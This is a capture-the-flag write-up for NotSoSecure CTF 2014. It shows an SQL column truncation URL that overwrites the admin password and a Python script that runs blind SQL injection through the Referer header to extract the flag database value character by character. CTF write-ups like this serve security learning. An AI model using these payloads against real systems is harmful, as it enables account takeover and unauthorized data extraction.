NotSoSecure CTF 2014 - Writeups

The first flag was about SQL column truncation vulnerability. So after finding registration page just enter something like this:

http://ctf.notsosecure.com/9128938921839838/register.php?regname=admin%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20x%26regemail%3Dasd@gmail.com%26regpass1%3Dasd123%26regpass2%3Dasd123

for overwrite the admin password and then just login with admin:asd123 to get the first flag.

The second flag was about BSQLi in HTTP header ‘Refer’ but for trigger it you’ll have to URL encode it. Script I used to extract the second flag:

import json,requests
url = 'http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php'
payload = {'some': 'data'}
# table: flag
# clmn flag
#flag: 1362390
pwd=""
for j in xrange(1,8):
    for i in xrange(33,122):
        #headers = {'Referer': 'ad%27),((select if((select ascii(substr(table_name,'+str(j)+',1)) from information_schema.tables where table_schema=database() limit 0,1)='+str(i)+',1,2*(select 1 union select 2))),0)%23'}
        #headers = {'Referer': 'ad%27),((select if((select column_name from information_schema.columns where table_name=0x666c6167 limit 0,1)=0x666c6167,1,2*(select 1 union select 2))),0)%23'}
        headers = {'Referer': 'ad%27),((select if((select ascii(substr(flag,'+str(j)+',1)) from flag limit 0,1)='+str(i)+',1,2*(select 1 union select 2))),0)%23'}
        r = requests.post(url, data=json.dumps(payload), headers=headers)
        if 'touch' in r.text:
            pwd+=chr(i)
            print "OK:"+chr(i)
            break
        else:
            print "Nope:"+str(i)

print pwd

Razor4x